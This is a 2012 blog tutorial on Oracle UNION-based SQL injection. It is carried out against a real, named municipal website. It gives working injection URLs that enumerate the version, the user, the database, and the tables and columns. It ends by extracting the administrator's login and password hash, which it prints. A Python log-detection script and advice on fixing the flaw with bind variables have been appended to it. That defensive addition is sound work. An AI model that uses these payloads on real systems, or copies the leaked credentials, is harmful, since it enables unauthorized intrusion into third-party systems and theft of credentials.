BASIC HACK

Friday 14 September 2012

Oracle SQL injection

Hello guys, this is a tutorial about Oracle-based SQL injection.
Here is the site to learn with:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 

Let's try order by

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1 

Look under the picture; the line there stays like this:
Sei in : Home -> Citta' -> Congressi

At order by 7 it changes:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207 
Sei in : Home -> Citta' ->
So the number of columns is 6.

Time to use union select

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null 

LOL... the vulnerable column isn't shown.
Let's try all columns.

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version 

Nothing is shown, so this is the wrong column.

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version 

The word congress is shown again. This is the right column.

VERSION


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,banner,NULL,NULL,NULL,NULL from v$version--

CORE 9.2.0.6.0 Production

CURRENT USER

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--

WWWTARANTO

CURRENT DATABASE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--

CSTTA

Retrieving user-created tables and columns from user_tab_columns. concat() works but takes only 2 parameters, so the queries below join values with || instead.

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--

54425F414C424F3A444154415F45534543555A494F4E45
Convert this hex value to a string:
TB_ALBO:DATA_ESECUZIONE
N.B.: you can also use the following command, which leaves out rawtohex:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--
To find the next column of table TB_ALBO


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE

54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE

Using >, all columns can be retrieved one at a time. If an error is generated or the query jumps to some other table, move on to the next table.

MOVING TO NEXT TABLE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--

54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE

MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID

EXTRACTING DATA

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--

61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264

administrator:9f21eddc68ef38787fb5ef91991bea2d
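
Every request in this walkthrough puts SQL text into the numeric id_categoria parameter, so the whole sequence is visible in the web server's access log. The detection sketch below is an added example, not part of the original post: the log lines are constructed, and the function name, marker names and the assumption that both parameters must be plain integers are mine.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: both parameters are meant to be plain integers, as in the post's URLs.
NUMERIC_PARAMS = {"id_news", "id_categoria"}

# Markers taken from the requests shown in this post.
MARKERS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "oracle_dictionary": re.compile(r"v\$version|user_tab_columns|\bfrom\s+dual\b", re.I),
    "hex_encoding": re.compile(r"\brawtohex\s*\(", re.I),
    "chr_chain": re.compile(r"(chr\s*\(\s*\d+\s*\)\s*\|\|\s*){2,}", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')

def inspect_line(line):
    """Return [(param, [marker, ...])] for numeric params carrying non-numeric data."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):  # also URL-decodes
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
            hits = sorted(k for k, rx in MARKERS.items() if rx.search(value))
            findings.append((name, hits or ["non_numeric_value"]))
    return findings

# Constructed access-log lines (documentation IP range), modelled on the requests above.
PREFIX = ('203.0.113.9 - - [14/Sep/2012:10:00:00 +0200] '
          '"GET /citta/dettaglio_news.php?id_news=491&id_categoria=')
SAMPLE_LOG = [
    PREFIX + '122 HTTP/1.1" 200 5120',
    PREFIX + '122%20order%20by%207 HTTP/1.1" 200 4987',
    PREFIX + '-122%20union%20select%20NULL,banner,NULL,NULL,NULL,NULL'
             '%20from%20v$version-- HTTP/1.1" 200 5200',
    PREFIX + '-122%20union%20select%20NULL,rawtohex(table_name%7C%7Cchr(58)'
             '%7C%7Ccolumn_name),NULL,NULL,NULL,NULL%20from%20USER_TAB_COLUMNS'
             '%20where%20column_name%3E%20CHR(68)%20%7C%7C%20CHR(65)%20%7C%7C'
             '%20CHR(84)-- HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for number, entry in enumerate(SAMPLE_LOG, 1):
        for param, hits in inspect_line(entry):
            print(f"line {number}: {param} -> {', '.join(hits)}")
```

Log detection is a backstop. The flaw itself is closed by passing id_categoria to the query as a bind variable and rejecting any value that is not an integer, instead of concatenating it into the SQL string.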

Sharing this because it's an ORACLE SQL injection.
Hope you like this.
